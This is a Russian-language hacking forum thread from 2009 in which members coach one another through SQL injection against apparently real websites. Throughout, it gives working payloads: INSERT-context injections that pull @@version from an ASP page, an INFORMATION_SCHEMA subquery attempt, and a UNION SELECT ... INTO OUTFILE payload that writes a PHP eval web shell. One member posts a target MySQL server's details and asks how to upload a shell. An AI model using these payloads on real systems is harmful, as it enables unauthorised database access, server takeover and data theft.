 |
|
05.11.2009, 20:17
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от jecka3000
ctacok,
я поробовал и не только такую комбинаци+еще раз прочел мануал от Кэша..ничего не выходит.
Вот ответ базы на твой запрос:
Здесь INSERT, так что читай ещё мануалы.
|
|
|
05.11.2009, 20:22
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
jecka3000 вставь:
@@version,1,1,1,1,1,1)+--+
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2009, 20:36
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Scipio, не катит
Microsoft OLE DB Provider for SQL Server error '80040e57'
String or binary data would be truncated.
/scripts/UserStatistic.asp, line 26
Ctacok, расскажи поподробнее, что означает insert и что прочесть? |
|
|
|
05.11.2009, 20:43
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
давай ссылку тогда, просто @@version надо подставить в нестроковое поле
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2009, 20:53
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
1',@@version,1,1,1,1)+--+
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2009, 21:16
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Scipio,кстати, а чтож тогда делать с information_schema?
1',=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)+--+ ?
|
|
|
|
05.11.2009, 21:31
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
хехе, не получится использовать подзапросы здесь
__________________
Карфаген должен быть разрушен...
|
|
|
|
05.11.2009, 22:34
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Scipio, ну посоветуй что нибудь, я вообще в такой ситуации первый раз, может быть мануал какой нить есть)
|
|
|
|
06.11.2009, 05:07
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
С нами:
9764446
Репутация:
123
|
|
Всем привет.
Есть сервак со след параметрами
base:articles
ver:5.1.36-community
user:root@localhost
basedir:C:\Program Files\MySQL\MySQL Server 5.1\
datadir:C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
os:Win32
mysql.password:****
mysql.user:****
tmpdir:C:\WINDOWS\TEMP
file_priv:Y
Собственно интересна возможность заливки шелла.
Если есть статьи какие нибудь про load_file- накидайте ссылок (я ничего толкового не нашел). И еще интересует возможность использования
mysql.password:****
mysql.user:****
Где и как можно узнать хост на котором БД.
Сорри, если что-то не так понял и неправильно написал.
Зы
-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.
Я так понимаю это вот этот путь C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
?
Заранее спасибо. С меня +++ за помощь. |
|
|
|
06.11.2009, 05:16
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Сообщение от hackmen
Где и как можно узнать хост на котором БД.
Сообщение от hackmen
user:root@localhost
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
